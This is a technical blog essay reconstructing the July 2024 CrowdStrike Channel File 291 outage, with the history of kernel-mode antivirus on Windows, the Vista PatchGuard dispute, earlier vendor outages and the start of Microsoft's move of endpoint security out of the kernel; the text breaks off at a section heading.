Parag Mali - tag: edr

Seventy-Eight Minutes That Evicted Antivirus From the Windows Kernel

noreply@paragmali.com (Parag Mali) — Tue, 02 Jun 2026 00:00:00 GMT

At 04:09 UTC on July 19, 2024, a CrowdStrike Falcon channel-file update -- not a driver update, but a small data file consumed by an in-kernel interpreter -- crashed approximately 8.5 million Windows hosts in seventy-eight minutes. The technical bug was a parameter count mismatch the content validator missed; the architectural bug was that the dangerous code was already in the kernel. Microsoft's response, the Windows Resiliency Initiative, commits to a multi-year migration of third-party endpoint security out of kernel mode -- a Vista-era idea finally given political license to ship. Whether user-mode EDR with hypervisor-assisted introspection can match twenty-five years of kernel-mode hooking coverage is the article's open architectural question, and the honest mid-2026 answer is "we do not yet know."

1. 04:09 UTC, Friday, July 19, 2024

At 04:09 UTC on Friday, July 19, 2024, a CrowdStrike Falcon Cloud release pipeline pushed a Rapid Response Content file -- not a sensor binary, not a driver update, but a small piece of data named in the C-00000291-*.sys channel-file naming convention -- to the production rollout channel for Falcon Sensor on Windows [@cs-pir-2024-07-24]. The release engineer at the rollout console saw the indicator move from staging to production. Sixty-six minutes later, by Microsoft's own count, approximately 8.5 million Windows hosts had bug-checked and were either rebooting into a kernel panic or already stuck in one [@ms-bradsmith-2024-07-20]. Delta and United pulled gates. The U.K. National Health Service diverted patients away from impacted trusts. Public-safety answering points went degraded across several U.S. states [@crs-if12717-everycrsreport]. CrowdStrike's release pipeline reverted the bad content at 05:27 UTC -- seventy-eight minutes after it had been pushed -- and the rollout indicator on the CrowdStrike side went from red back to green [@cs-pir-2024-07-24]. The rollout indicator on every customer machine that had already received the bad content went, and stayed, blue. The dangerous code was already in the kernel; the update had only handed it a fatal input.

That single fact -- that a content update could brick eight and a half million machines without the code path that consumed the content ever being treated as a code path -- is the whole reason this article exists.

The numbers, anchored to primary sources

Brad Smith, Microsoft's vice chair and president, published his "8.5 million Windows devices" figure on July 20, 2024 -- the morning after the incident -- and the phrase is unchanged in any Microsoft document since: "we currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines" [@ms-bradsmith-2024-07-20]. The U.S. Government Accountability Office later framed the incident as "potentially one of the largest IT outages in history" [@gao-24-107733]. The U.S. Cybersecurity and Infrastructure Security Agency opened a running advisory the same day, anchored to its own July 19, 2024 alert, that has been updated continuously since [@cisa-alert-2024-07-19]. The Congressional Research Service's IF12717 brief lays out the public-safety blast radius -- FAA ground stops, 911 PSAP degradation, hospital systems falling back to paper -- and Adam Meyers, CrowdStrike's Senior Vice President for Counter Adversary Operations, was sworn in before the House Homeland Security Committee's Cybersecurity Subcommittee on September 24, 2024 to answer for it [@crs-if12717-everycrsreport, @homeland-hearing-page, @cyberscoop-meyers].

The fault, as Microsoft's dump shows it

Eight days after the outage, on July 27, 2024, Microsoft's security team published a primary-source post-mortem [@ms-secblog-2024-07-27]. The dump's load-bearing fields, condensed and relabeled below for readability (Microsoft's actual labels are READ_ADDRESS, IMAGE_NAME, FAULTING_MODULE, with the faulting instruction inside the .trap disassembly and KiPageFault inside the stack trace):

READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369

Read low to high, every line answers a different question. csagent.sys is the CrowdStrike Falcon kernel driver. csagent+e14ed is the offset of the faulting instruction inside that driver. mov r9d, dword ptr [r8] is that instruction -- a single x86-64 move that loads a 32-bit value from the memory address in register r8 into register r9d. The address in r8 was 0xffff840500000074, in the high half of the kernel virtual address space, which the labelling "Paged pool" suggests the memory manager classifies as paged kernel memory -- but at that specific virtual address, on this machine, at this instant, no page table entry mapped a physical page. The CPU raised a page fault. Windows delivered the fault to nt!KiPageFault+0x369. The kernel bug-checked with PAGE_FAULT_IN_NONPAGED_AREA [@ms-secblog-2024-07-27, @ms-bradsmith-2024-07-20].

There is one piece of information the WinDBG dump does not publish, and the article is going to be careful about it: the IRQL value at the moment of the fault. No primary source records whether csagent.sys was at PASSIVE_LEVEL, APC_LEVEL, DISPATCH_LEVEL, or higher when the page fault triggered. What every primary source agrees on is the consequence: the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way, and the operating system stopped. Treat any third-party post that asserts a specific IRQL value for Channel File 291 as speculation unless it cites a primary source that publishes the value.

sequenceDiagram participant Cloud as Falcon Cloud Rollout participant Sensor as Falcon Sensor (user mode) participant Driver as csagent.sys (kernel) participant Kernel as Windows Kernel participant Disk as Local Disk Cloud->>Sensor: 04:09 UTC push of Channel File 291 Sensor->>Disk: Persist channel file Sensor->>Driver: Load Template Instance into in-kernel interpreter Driver->>Driver: Index 21st parameter slot Driver->>Kernel: Dereference unmapped kernel address 0xffff840500000074 Kernel->>Kernel: nt!KiPageFault, then bug check 0x50 Note over Kernel: PAGE_FAULT_IN_NONPAGED_AREA, host blue screens Cloud->>Cloud: 05:27 UTC, revert bad content Note over Cloud,Disk: New hosts are saved, already-affected hosts are not Disk->>Driver: On reboot, csagent.sys re-reads the persisted file Driver->>Kernel: Same fault path executes again

The persistence-across-reboot pathology is the part most contemporary coverage understated. CrowdStrike reverted the bad content from the cloud rollout pipeline 78 minutes after pushing it [@cs-pir-2024-07-24]. But the file was already on disk on every machine that had received it. On reboot, csagent.sys loaded again, parsed the persisted file again, and bug-checked again. The fix required either a manual safe-mode deletion -- the canonical "boot, delete C-00000291*.sys, reboot" runbook that circulated on Reddit, social media, and vendor advisories that morning -- or, later, Microsoft's purpose-built recovery tool [@mslearn-qmr].

That is what happened. The next question -- the one this article exists to answer -- is why the dangerous code was already in the kernel in the first place, what twenty-five years of architectural decisions put it there, and what it took to begin to undo those decisions. To get there, we have to start in 1999.

2. Why Antivirus Lives in the Kernel

Imagine you are a security engineer in 1999. Your assignment is to detect a virus that has installed itself between the user-mode file APIs and the on-disk file system, so that when a scanner running as a user reads the file, the virus serves up a clean copy of the bytes and hides the infected ones. Where do you put the observer?

If you think about it for a minute, you converge on the same answer Microsoft, Symantec, Network Associates, Trend Micro, and every other antivirus vendor converged on in the late 1990s: you put the observer below the thing that is lying. In Windows terms, "below" means kernel mode. On x86, that is Ring 0. In NT terminology, that is the privilege level at which all the operating system primitives -- the file system, the process manager, the memory manager -- actually live.

A per-processor priority value Windows uses to gate code execution against hardware and software interrupts. Code running at PASSIVE_LEVEL (zero) can be preempted by almost anything; code running at DISPATCH_LEVEL or higher cannot take page faults on pageable memory and must complete quickly. Kernel drivers must obey strict IRQL rules; violations -- such as touching pageable memory at DISPATCH_LEVEL -- produce immediate bug checks rather than recoverable exceptions.

The 1999 to 2003 transition

The first generation of Windows antivirus, on Windows 9x and NT 4.0, ran almost entirely in user mode and lost the argument with the first rootkits to ship in the wild. A scanner that runs in the same protection ring as the malware it is hunting cannot, by construction, see what the malware has chosen to hide from anything in that ring. The fix, by the late 1990s and the early 2000s, was to push the scanner into Ring 0.

Two specific Windows kernel primitives carried that fix.

The first was the minifilter: a kernel driver attached to the I/O manager's file system stack at a specific altitude, intercepting IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, and friends, so the antivirus could examine the file before the file system returned the bytes to user mode [@mslearn-filter-drivers]. Microsoft formalized the Filter Manager as the supported way to do this -- and by the mid-2000s the legacy sfilter model was deprecated in favor of the structured minifilter model. Every shipping Windows antivirus in 2026 still has a minifilter driver loaded as part of its boot-time stack.

A kernel driver registered through the Windows Filter Manager that attaches to one or more file system volumes at a specific *altitude* (a Microsoft-assigned numeric priority) and receives pre-operation and post-operation callbacks for each file system operation. Antivirus minifilters use this hook point to scan a file before user-mode code sees the bytes returned from disk.

The second was the process-create kernel callback. Beginning with Windows 2000 and extended for synchronous block authority in Windows Vista SP1 (alongside Windows Server 2008), the documented function PsSetCreateProcessNotifyRoutine (and later PsSetCreateProcessNotifyRoutineEx) lets a kernel driver register to be called whenever the kernel is about to create a new process, with the option in the extended variant to set CreationStatus = STATUS_ACCESS_DENIED and synchronously block the create [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-pssetcreateprocessnotifyroutineex]. This is the kernel primitive that lets an EDR vendor say "process X is about to spawn cmd.exe with these arguments, and we are denying the create" without ever exiting the kernel. Companion callbacks exist for image-load events, thread-create events, registry operations [@mslearn-cmregistercallback], and handle-access events [@mslearn-obregistercallbacks]. Together they form the documented Generation-2 vendor API surface for EDR primitives, the architectural substrate every modern Windows EDR sits on top of.

The rootkit pressure

The second pressure that pushed antivirus down into the kernel came from the attackers themselves. By the mid-2000s, kernel-mode rootkits were a routine part of the malware writer's toolkit. The most pernicious variants used a technique called Direct Kernel Object Manipulation: instead of installing themselves anywhere a defender could observe via documented APIs, they walked Windows internal data structures and unlinked themselves from the lists the operating system traversed when answering questions like "what processes are running?" or "what kernel modules are loaded?"

A rootkit technique that modifies in-memory Windows kernel data structures directly -- for example, unlinking an `EPROCESS` block from the active process list so that `nt!PsActiveProcessHead` traversal does not enumerate the malicious process. Because the modification is invisible to any code that asks the kernel to enumerate via the documented APIs, the only defenders that can see DKOM are those that walk kernel memory authoritatively from a vantage equal to or below the rootkit itself.

To catch a Ring-0 rootkit, you needed a Ring-0 defender. Symantec, McAfee, Trend Micro, and Kaspersky all converged on the same answer in the early 2000s, and every commercial Windows EDR architecture in 2026 still reflects that convergence.The lineage from DOS-era signature scanners (one-process, no privilege boundary) through Win9x scanners (no privilege boundary either) through NT-era minifilters (a privilege boundary, with the scanner across the boundary from the malware) to 2024-era in-kernel content interpreters (a privilege boundary, with the scanner and a rule engine and an unsigned content channel all on the same side of the boundary) is a small case study in how an architecture persists long after the original constraints relax.

Architectural decisions made under one set of constraints have a way of outliving the constraints that produced them. The 1999 decision to put antivirus in the kernel was rational at the time -- it was the only place from which you could authoritatively see what a process or a file system actually did. Twenty-five years later, that decision produced csagent.sys running in Ring 0 on 8.5 million machines, indexing past the end of a parameter array on a Friday morning in July.

But the move into the kernel did not go uncontested. Microsoft itself spent two years between 2005 and 2007 trying to claw back at least part of that ground. The first attempt was called Kernel Patch Protection, and the political fight it produced is the story of the next section.

3. The Vista PatchGuard Battle, 2005-2007

Either everybody has access to the kernel, or nobody does. -- Stephen Toulouse, Microsoft senior product manager, InformationWeek, October 2006 [@informationweek-2006-toulouse]

The political question at the heart of this article is twenty years old. It is also binary in a way that very few political questions ever are: Microsoft's stated position in 2006 was not "we will permit some vendors to modify the kernel and deny others," nor "we will run an accreditation scheme," nor "we will charge for kernel-mode signing certificates." The stated position was that either every vendor on Earth could modify the Windows kernel or no vendor could, and the only stable answer was the second one. That argument, made by a Microsoft senior product manager in trade press in 2006, reverberates without modification into the November 2024 Windows Resiliency Initiative announcement.

What Kernel Patch Protection actually does

Kernel Patch Protection -- commonly called PatchGuard -- shipped with x64 editions of Windows XP, Windows Server 2003 Service Pack 1, and the launch x64 edition of Windows Vista, beginning in 2005 [@wiki-kpp]. Microsoft updated it in August 2007 via Security Advisory 932596, which is the canonical Microsoft primary document for the program [@ms-advisory-932596].

A Windows kernel feature on x64 builds that periodically verifies the integrity of selected critical kernel structures -- the System Service Descriptor Table (SSDT), the Interrupt Descriptor Table (IDT), the Global Descriptor Table (GDT), the kernel image, the Hardware Abstraction Layer (HAL), and the NDIS network stack. If PatchGuard detects modification it triggers bug check `0x109` `CRITICAL_STRUCTURE_CORRUPTION` and the operating system stops [@wiki-kpp].

What PatchGuard does is enforce an invariant: third-party code may not modify a specific list of kernel data structures, and if it does, the system bug-checks. What PatchGuard does not do is prevent third-party drivers from loading. PatchGuard is a structural integrity check, not a load-time policy. The Vista-era plan was for vendors to migrate from inline hooks of the SSDT to the documented callback APIs of the previous section -- PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks, CmRegisterCallback, the Filter Manager [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-obregistercallbacks, @mslearn-cmregistercallback, @mslearn-filter-drivers] -- and csagent.sys is the lineal descendant of that migration: a fully documented, fully callback-based, fully Generation-2 driver. PatchGuard did exactly what it was designed to do, and csagent.sys was perfectly compatible with it.

The political fight

Symantec and McAfee did not see it that way in 2005. To them, PatchGuard was Microsoft using a security feature to advantage its own emerging Microsoft Forefront Client Security antivirus product against the entire third-party industry. The complaint escalated to the European Commission in October 2006 [@wiki-kpp]. Stephen Toulouse, then a Microsoft senior product manager, replied in InformationWeek with the line that anchors this section: "Either everybody has access to the kernel, or nobody does. Malware writers exploit the same interfaces to access Windows kernel, a threat that Microsoft says outweighs the benefits. Modifying the kernel also compromises Windows performance, according to the company" [@informationweek-2006-toulouse]. Microsoft's binary-symmetry position was that any vetting scheme -- "trusted vendors get kernel access" -- would simply produce malware that pretended to be a trusted vendor. The only stable equilibria were "everyone" and "no one." Microsoft chose "no one for the things PatchGuard protects," and then opened a parallel migration path of documented callback APIs as the supported alternative.

The Symantec and McAfee complaints in 2006 were filed in the wake of Microsoft's own 2005 entry into the corporate antivirus market with what became Forefront Client Security. The trade press read it as the same competitive grievance Netscape filed against Microsoft a decade earlier: a platform owner introducing first-party products into a market the platform owner also regulated. Gartner's John Pescatore framed the worry, quoted in the same InformationWeek piece, as Microsoft becoming *"the layer between the user and the security products"* [@informationweek-2006-toulouse]. The European Commission opened an inquiry; Microsoft compromised by documenting the callback APIs and shipping the August 2007 update to KPP [@ms-advisory-932596]. The two AV vendors stayed in business; their kernel hooks moved from SSDT patches to `PsSetCreateProcessNotifyRoutine` calls. Twenty years later, the same two vendors -- both still selling Windows EDR products -- are now publicly endorsing Microsoft's move to take *all* third-party EDR out of the kernel. The political ground really has shifted; we will see by how much in section 6.

The lesson Microsoft drew, and the lesson it did not yet draw

The 2005 to 2007 round produced a real, durable architectural lesson: documented APIs are stabler than hooks. A vendor who wrote a driver that called PsSetCreateProcessNotifyRoutineEx could rely on Microsoft to preserve the API across Windows builds. A vendor who wrote a driver that patched the SSDT pointer table directly could rely on the next Windows service pack to break it without warning, or now on PatchGuard to bug-check the host. Every shipping Windows EDR in 2026 lives downstream of that lesson -- their kernel drivers use the documented callback APIs and they do not patch kernel structures inline.

But there was a second lesson Microsoft did not draw in 2005. The PatchGuard fight was about technique (do not patch the SSDT) and it stopped there. It did not pose the deeper question: should third-party kernel drivers exist at all for AV? That question -- whether vendor-authored Ring-0 code is a fleet-scale reliability liability regardless of whether it hooks or uses callbacks -- was visible in principle in 2005 and ignored. Microsoft would not pose it publicly for another nineteen years. What changed, in the meantime, was a slow drip of failures that should have made the question unavoidable and somehow did not. That drip is the subject of section 4.

4. Fourteen Years of Kernel-Driver Disasters

If the kernel-mode antivirus architecture was a 1999 design choice, you would expect it to have aged badly. It did. The pattern played out generation after generation, vendor after vendor, year after year, with the same general shape: a vendor pushed content; the vendor kernel driver consumed the content; the content had a bug the validator missed; the driver crashed the kernel; the fleet went down. The most consequential single instance of the pattern, before July 19, 2024, happened on April 21, 2010 with McAfee VirusScan and a daily virus definition update named DAT 5958.

McAfee DAT 5958, April 21, 2010

McAfee shipped its 5958 DAT file. The file misidentified svchost.exe -- the legitimate Windows service host -- as W32/Wecorl.a, a network worm. The McAfee kernel driver quarantined svchost.exe per the false positive. On Windows XP SP3 fleets at hospitals, police departments, schools, and government agencies across the U.S., the result was an immediate reboot loop and total loss of networking [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee].

US-CERT's contemporaneous advisory captured the failure mode in a single sentence: "US-CERT is aware of public reports indicating that McAfee DAT release 5958 is incorrectly identifying the valid system file, C:\Windows\system32\svchost.exe, as containing malicious code... Symptoms include a denial-of-service condition when the McAfee software attempts to clean the file" [@uscert-mcafee-2010]. SANS's Internet Storm Center noted the same morning that "DAT file version 5958 is causing widespread problems with Windows XP SP3. The affected systems will enter a reboot loop and lose all network access" [@sans-isc-8656]. Microsoft's own AskPerf team, in a TechCommunity post dated April 21, 2010, walked through the recovery steps and the EXTRA.DAT remediation [@askperf-mcafee].

Here is the structural point, and it matters enormously for the rest of this article: the McAfee driver was doing nothing PatchGuard would have prevented. It was a fully Generation-2 design, using documented kernel callback APIs, with no inline kernel patching whatsoever. The 2005 PatchGuard fight was politically irrelevant to the 2010 McAfee outage, because PatchGuard was answering a different question -- "does the vendor patch SSDT entries inline?" -- when the question that produced the McAfee outage was "does the vendor's signed, callback-using, fully-supported kernel driver act on data that turns out to be wrong?" The 2005 fix did not address the 2010 fault.

Key idea: McAfee 2010 and CrowdStrike 2024 are architecturally identical: a vendor pushed content; the vendor kernel driver consumed the content; the content was wrong in a way that the validator did not catch; the driver crashed the fleet. The 2005 PatchGuard fight had been about a different problem entirely. The architecture that produced both failures -- "vendor-authored Ring-0 code consuming cloud-pushed updates" -- was untouched by the 2005 fix and would not be touched again until 2024.

The mid-2010s tail

Between 2010 and 2024 the same pattern reappeared at smaller scale, episodically, across the vendor cohort. Symantec, Trend Micro, Kaspersky, and Sophos each shipped at least one driver or definition update during this period that produced blue-screen reports on customer fleets. The Three Buddy Problem podcast, recorded on July 19, 2024 in the immediate aftermath of the CrowdStrike outage, opens with Costin Raiu drawing the line back from 2024 to 2010 explicitly: the lesson the industry promised itself after McAfee 5958 was staged rollouts, and the lesson the industry actually implemented was insufficient [@three-buddy-ep5].Raiu's framing on the podcast -- "we had this exact discussion in 2010, and the answer everyone agreed on was staged rollouts, and here we are again" -- is the cleanest single-sentence retrospective from inside the industry. The same week, Patrick Wardle was making the same point with macOS-side framing on his Objective-See blog [@wardle-objsee-0x7b] and at the August 2024 Black Hat USA talk whose slides he later published [@wardle-speakerdeck].

The Apple natural experiment, September 2024

Two months after CrowdStrike Channel File 291, Apple shipped macOS 15 Sequoia on September 16, 2024 with deprecated Application Firewall property-list interfaces [@bleepingcomputer-sequoia]. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all broke their network filtering [@securityweek-sequoia, @bleepingcomputer-sequoia]. Apple shipped macOS 15.0.1 on October 3, 2024, seventeen days later, restoring compatibility [@techcrunch-sequoia]. The TechCrunch report has Patrick Wardle on the record, framing the architectural difference in one line: "a fix for the networking issues that plagued the initial macOS 15 release... And to any Apple apologist who blamed 3rd-party vendors, you deserve to be slapped with a large trout as this was an Apple bug reported before GM" [@techcrunch-sequoia].

That second sentence is the load-bearing one. The Sequoia bug was a 1st-party regression in the framework boundary between macOS and third-party endpoint security tools. It degraded EDR features substantially -- network filtering disappeared on every affected host -- but no host kernel-panicked. None of the affected EDR vendor processes brought down macOS. None of the affected hosts entered a reboot loop. The same general failure mode as Channel File 291 produced a fundamentally different blast radius, and the only reason for the difference is architectural: Apple had moved third-party endpoint security out of macOS kernel mode in 2019 with the Endpoint Security framework [@apple-esf-docs]. We will return to ESF in section 7.

The macOS 15 Sequoia outage and the Windows Channel File 291 outage occurred within ten weeks of each other and shared the same general structure: a 1st-party platform event meeting a third-party security product loaded for runtime introspection. The Windows event panicked the kernel on 8.5 million hosts. The macOS event produced a feature regression that vendors patched out within three weeks and Apple repaired in 15.0.1. The two events are the article's strongest single comparative datum that architecture, not vendor reliability, was the variable. timeline title Recurring kernel-driver and platform faults, 2005 to 2024 2005 : PatchGuard ships on Windows x64 : Symantec and McAfee escalate antitrust complaints 2010 : McAfee DAT 5958 quarantines svchost.exe on Windows XP SP3 : Fleet-scale reboot loops at hospitals, police, schools 2014 : Various smaller vendor BSOD events in the long tail 2019 : Apple ships macOS Catalina Endpoint Security framework : Third-party AV deprecated from kernel mode on macOS 2024 : CrowdStrike Channel File 291 on July 19, 8.5M hosts : Apple ships macOS 15 Sequoia on September 16 : macOS 15.0.1 restores AV compatibility on October 3 2024 : Microsoft Ignite announces Windows Resiliency Initiative on November 19

CrowdStrike Channel File 291, July 19, 2024

By July 2024 the cumulative evidence had been building for fourteen years that vendor-authored Ring-0 code was a fleet-scale reliability liability. What was different about Channel File 291 was not the kind of failure but the scale and the cost: 8.5 million hosts on Windows in 2024 versus what was likely a six-or-seven-figure XP SP3 fleet on McAfee in 2010, and a cost calculus that included Delta Air Lines, the U.K. NHS, multiple state 911 systems, and the global air-traffic-control flow that depends on Microsoft Windows running healthy [@cs-pir-2024-07-24, @gao-24-107733, @crs-if12717-everycrsreport]. The political license to do something architectural had finally arrived. What it took, in real-world failures, to surface the architectural answer was not new evidence -- the evidence had been overwhelming for years -- but a single event large enough to make the political cost of not changing untenable.

So: what exactly happened inside csagent.sys on the morning of July 19, 2024? That technical reconstruction is the centerpiece of this article, and it occupies the next section.

5. Inside Channel File 291

The technical centerpiece. Start by staring at the same five-field summary, reformatted from Microsoft's July 27, 2024 crash-dump walkthrough [@ms-secblog-2024-07-27]:

READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369

Reading from low to high address, every line of that summary answers a different question. The complete line-by-line walkthrough is folded into the spoiler later in this section. First we have to understand what csagent.sys was trying to do when it ran the instruction.

The Windows bug check raised when kernel code attempts to read from or write to a virtual address that has no valid mapping in the page tables. The "nonpaged area" naming is historical -- the bug check fires whenever any kernel-mode access touches an unmapped virtual address, regardless of which memory pool the address would have lived in if it had been valid.

What `csagent.sys` was trying to do

csagent.sys is the CrowdStrike Falcon Sensor kernel driver, the Ring-0 component that has been part of the Falcon product since its earliest Windows releases. By 2024, this driver did considerably more than mediate file I/O and process creation. According to CrowdStrike's own Root Cause Analysis published on August 6, 2024, csagent.sys includes a Content Interpreter that runs at kernel privilege and consumes binary detection rules shipped from the Falcon Cloud [@cs-rca-2024-08-06]. CrowdStrike's terminology distinguishes two kinds of content delivery: Sensor Content, which is bundled with each released sensor binary and updates at the sensor release cadence; and Rapid Response Content, which is delivered via channel files like Channel File 291 and updates at a much faster cadence to keep ahead of novel adversary behavior [@cs-pir-2024-07-24]. Channel files are treated as data, not code -- but they are consumed by the Content Interpreter, which is code, running in the kernel.The Sensor Content versus Rapid Response Content distinction is the architectural detail that determines why a content update could reach the kernel at all. Sensor Content is signed and version-bumped together with the driver binary; Rapid Response Content is pushed independently and rapidly. The Falcon architecture used the Rapid Response Content channel to deliver Template Instances against a Template Type schema that the in-kernel Content Interpreter parsed. The channel-file delivery path bypassed the WHQL driver-signing scrutiny that the driver binary itself had received [@cs-pir-2024-07-24].

The CrowdStrike Falcon Sensor subsystem, resident inside `csagent.sys` at kernel privilege, that parses Rapid Response Content channel files at runtime. The interpreter reads a Template Instance (a binary payload of detection rules) and evaluates it against the corresponding Template Type schema declared in the sensor's compiled code. Detection rules thus take effect on a host whenever a new channel file is pushed from the Falcon Cloud, with no sensor binary update required.

The bug, exactly

CrowdStrike's RCA names the failure mode in plain language [@cs-rca-2024-08-06]. The IPC Template Type was introduced in Falcon sensor version 7.11, released on February 28, 2024. The IPC Template Type declares 21 input parameter fields. The sensor's integration code that fed the in-kernel Content Interpreter for this Template Type supplied only 20 input values -- one fewer than the schema declared. The Content Validator that was responsible for verifying each shipped Template Instance against its Template Type schema did not catch the count mismatch. From February 28 to July 19, all Template Instances against this Template Type happened to use a wildcard matcher on the 21st field, and the unmapped field went unread; the bug was latent for almost five months. On July 19, 2024, the deployed Template Instance for the first time used a non-wildcard matcher on the 21st field. At runtime on every Windows host with the affected Falcon sensor configuration, csagent.sys's Content Interpreter indexed into the 21st parameter slot and dereferenced past the end of the input array [@cs-rca-2024-08-06].

The faulting instruction was the mov r9d, dword ptr [r8] that Microsoft's July 27 post reproduces. The pointer in r8 was the unmapped kernel address 0xffff840500000074. The CPU page-faulted. The fault was delivered to nt!KiPageFault+0x369. The kernel bug-checked with PAGE_FAULT_IN_NONPAGED_AREA [@ms-secblog-2024-07-27].

- `READ_ADDRESS: ffff840500000074 Paged pool`. The virtual address the faulting instruction tried to read. The `ffff8405...` prefix is the high half of the x86-64 canonical address space -- on Windows, conventionally kernel virtual memory. The "Paged pool" label is the memory manager's classification of where the address would have lived if it had been mapped. At this instant, it was not. - `IMAGE_NAME: csagent.sys`. The kernel module containing the faulting instruction. This is the CrowdStrike driver. - `FAULTING_IP: csagent+e14ed`. The offset of the instruction inside `csagent.sys`. `e14ed` is the relative virtual address of the function reading the parameter slot. - `mov r9d, dword ptr [r8]`. The instruction itself: load a 32-bit value (`dword`) from the address in `r8` into the lower 32 bits of `r9`. This is one of the cheapest x86-64 memory loads possible; the bug is not in the instruction but in the value of `r8`. - `CALLED_FROM: nt!KiPageFault+0x369`. The point of return into the kernel's fault handler. `KiPageFault` is the standard #PF interrupt handler in `ntoskrnl.exe`. When the page fault could not be satisfied (no mapping for the requested address), `KiPageFault` raised the bug check that stopped the system.

About the IRQL -- the part of the post-mortem this article is most careful with. As §1 established, no public CrowdStrike RCA or Microsoft secblog post publishes the IRQL value at the moment of the fault [@ms-secblog-2024-07-27, @cs-rca-2024-08-06]. The article will not assert DISPATCH_LEVEL or any other specific value, because no primary source establishes one. Treat any third-party reconstruction that names the IRQL as speculation unless it cites a primary source.

sequenceDiagram participant Cloud as Falcon Cloud participant Sensor as Falcon Sensor (user mode) participant CI as Content Interpreter (csagent.sys) participant TT as Template Type schema, in driver participant TI as Template Instance, from channel file participant Kernel as Windows Kernel Cloud->>Sensor: Push Channel File 291 (Rapid Response Content) Sensor->>CI: Hand Template Instance to in-kernel interpreter CI->>TT: Read schema declaring 21 input parameter fields CI->>TI: Bind Template Instance values to schema fields Note over CI,TI: Integration code supplied 20 values, schema expected 21 Note over CI,TI: Content Validator did not catch the count mismatch CI->>TI: Index into 21st field for non-wildcard match CI->>Kernel: Read at unmapped kernel address 0xffff840500000074 Kernel->>Kernel: nt!KiPageFault, bug check 0x50 raised Note over Kernel: Operating system stops, host blue screens

Why a content update can crash a kernel driver

This paragraph is doing the load-bearing work of the entire article, and it deserves to be read slowly. The Falcon driver's code received WHQL signing scrutiny when CrowdStrike submitted each release of csagent.sys to Microsoft. The driver's content updates -- the channel files like Channel File 291 -- did not. The driver was architected so that data updates could drive new detection behavior without a driver release. Therefore the data file became the trust boundary. When the data file was malformed in a way the Content Validator missed, the entire WHQL signing scrutiny of the driver was effectively bypassed -- because the bug was triggered by a fully-signed driver consuming an unsigned data input that no one had validated against the driver's actual runtime expectations.

Note: The architectural lesson of Channel File 291 is not "kernel drivers are unsafe." It is that in modern EDR architectures, the cadence of content updates vastly outruns the cadence of code review, and when the content is interpreted in kernel context, the content becomes a kernel input. The trust boundary moved from the signed driver to the unsigned data file, and the industry had not named that movement before July 19, 2024. Microsoft Virus Initiative 3.0, which we will meet in section 6, names it explicitly and requires partners to engineer for it.

To make the abstract count-mismatch tangible for the reader who has never written a parser, here is the bug in a stripped JavaScript model. The JavaScript model does what every memory-safe runtime does -- it throws cleanly when you index past the end of an array -- but the comment in the unsafe branch describes the C / kernel reality: the read just returns whatever bytes happen to live at the out-of-bounds address, which on Windows kernel memory means an unmapped page and a PAGE_FAULT_IN_NONPAGED_AREA bug check.

{` // Model of the in-kernel Content Interpreter from CrowdStrike's RCA. // Template Type schema declares 21 fields; integration code supplied 20. // On July 19, 2024, the deployed Template Instance for the first time // used a non-wildcard matcher on the 21st field.

const schema = { fieldCount: 21 }; const instance = { values: Array.from({length: 20}, (_, i) => 'v' + i) };

// Memory-safe runtime catches the mismatch: try { runInterpreter(schema, instance, true); } catch (e) { console.log('SAFE:', e.message); }

// Unsafe model showing what the in-kernel C interpreter would do: runInterpreter(schema, instance, false); `}

The runnable model is doing one job: making the abstract "20 of 21" fault mode visible. In a memory-safe runtime, the validator (the runtime itself) catches the mismatch and throws. In a C kernel driver with no runtime validator, the load just happens, and whatever is at the out-of-bounds address is read. On csagent.sys on every affected Windows host on July 19, 2024, what was at the out-of-bounds address was an unmapped page, and the read fired PAGE_FAULT_IN_NONPAGED_AREA.

The persistence problem

CrowdStrike reverted the bad content cloud-side at 05:27 UTC, seventy-eight minutes after pushing it [@cs-pir-2024-07-24]. The revert achieved exactly the thing it was designed to achieve: no host that had not yet received the bad content would receive it. The revert achieved nothing for any host that had already received the bad content. The channel file was on disk. On reboot, the Falcon sensor reloaded it. The in-kernel Content Interpreter parsed it again. The host bug-checked again. The fix required either manual safe-mode deletion of C-00000291*.sys -- which became the canonical morning-of runbook circulated on every Windows admin forum -- or, later, Microsoft's purpose-built recovery tool [@mslearn-qmr, @insider-build-26120-4230]. The persistence-across-reboot pathology motivated the platform-level recovery primitive Microsoft would later ship as Quick Machine Recovery, which we will meet in section 6.

The bug is mundane. The kernel context is what made it catastrophic. Twenty-five years of architectural decisions placed a vendor-authored interpreter inside the kernel, plugged it into a cloud-driven content delivery pipeline, and shipped that combination to 8.5 million machines. On the morning of July 19, 2024, those decisions composed.

What the platform vendor -- Microsoft -- did about that composition is the subject of section 6.

6. The Microsoft Response: WESES, WRI, MVI 3.0

Twenty days after a Congressional witness from CrowdStrike apologized on the record [@cyberscoop-meyers, @govinfo-chrg-118hhrg60030, @meyers-testimony, @homeland-hearing-page], Microsoft did what twenty years of lobbying could not produce: it convened the named Microsoft Virus Initiative partners in Redmond and announced that "additional security capabilities outside of kernel mode" was now a stated platform direction [@weston-2024-09-12]. From that meeting forward, the trajectory of third-party endpoint security on Windows pointed in only one direction.

September 10, 2024: the WESES summit

